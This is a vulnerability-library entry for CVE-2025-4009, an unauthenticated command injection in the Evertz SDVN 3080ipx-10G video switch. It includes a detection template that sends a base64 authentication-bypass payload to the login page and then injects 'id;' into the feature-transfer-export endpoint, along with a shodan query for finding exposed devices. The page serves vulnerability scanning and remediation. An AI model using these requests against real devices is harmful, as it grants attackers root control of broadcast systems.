/Vulnerability Library

Evertz SDVN 3080ipx-10G - Unauthenticated Arbitrary Command Injection

CVE-2025-4009
Verified

Description

The Evertz SDVN 3080ipx-10G is a High Bandwidth Ethernet Switching Fabric for Video Application. This device exposes a web management interface on port 80. This web management interface can be used by administrators to control product features, setup network switching, and register license among other features. The application has been developed in PHP with the webEASY SDK, also named ‘ewb’ by Evertz.This web interface has two endpoints that are vulnerable to arbitrary command injection and the authentication mechanism has a flaw leading to authentication bypass.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.This level of access could lead to serious business impact such as the interruption of media streaming, modification of media being streamed, alteration of closed captions being generated, among others.

Severity

Critical

CVSS Score

9.3

Exploit Probability

5%

Published Date

June 12, 2025

Template Author

onekey, iamnoooob, pdresearch

CVE-2025-4009.yaml
id: CVE-2025-4009

info:
  name: Evertz SDVN 3080ipx-10G - Unauthenticated Arbitrary Command Injection
  author: ONEKEY,iamnoooob,pdresearch
  severity: critical
  description: |
    The Evertz SDVN 3080ipx-10G is a High Bandwidth Ethernet Switching Fabric for Video Application. This device exposes a web management interface on port 80. This web management interface can be used by administrators to control product features, setup network switching, and register license among other features. The application has been developed in PHP with the webEASY SDK, also named ‘ewb’ by Evertz.This web interface has two endpoints that are vulnerable to arbitrary command injection and the authentication mechanism has a flaw leading to authentication bypass.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.This level of access could lead to serious business impact such as the interruption of media streaming, modification of media being streamed, alteration of closed captions being generated, among others.
  impact: |
    Unauthenticated attackers can bypass authentication and execute arbitrary commands with root privileges, potentially disrupting media streaming or manipulating content.
  remediation: |
    Apply the security patch from Evertz or restrict network access to the web management interface to trusted administrators only.
  reference:
    - https://www.onekey.com/resource/security-advisory-remote-code-execution-on-evertz-svdn-cve-2025-4009
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/V:C
    cvss-score: 9.3
    epss-score: 0.05406
    epss-percentile: 0.89833
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"evertz.min.css"
  tags: cve,cve2025,evertz,rce,unauth,vkev,vuln

variables:
  payload: '{"user": {"name": "admin", "login": "admin"},"role":{"name":"administrator", "restrictions": [],"deleteable": false}}'

http:
  - raw:
      - |
        GET /login.php?authorized={{base64(payload)}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "PHPSESSID","webeasy-loggedin","index.php")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /v.1.5/php/features/feature-transfer-export.php?action=id;&filename=&varid=&slot= HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'

      - type: status
        status:
          - 200
# digest: 490a004630440220171aa8689674910eb68b10f850f8c3ca66f10a537f2278fd7b758bc2332e759b02207c53714513d776be7fa6e2b1f88b76528836eaf8c4829ae2ca675c9e79b99df0:922c64590222798bb761d5b6d8e72950
9.3Score

CVSS Metrics

CVSS Vector:
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/V:C

References

https://www.onekey.com/resource/security-advisory-remote-code-execution-on-evertz-svdn-cve-2025-4009

Remediation Steps

Apply the security patch from Evertz or restrict network access to the web management interface to trusted administrators only.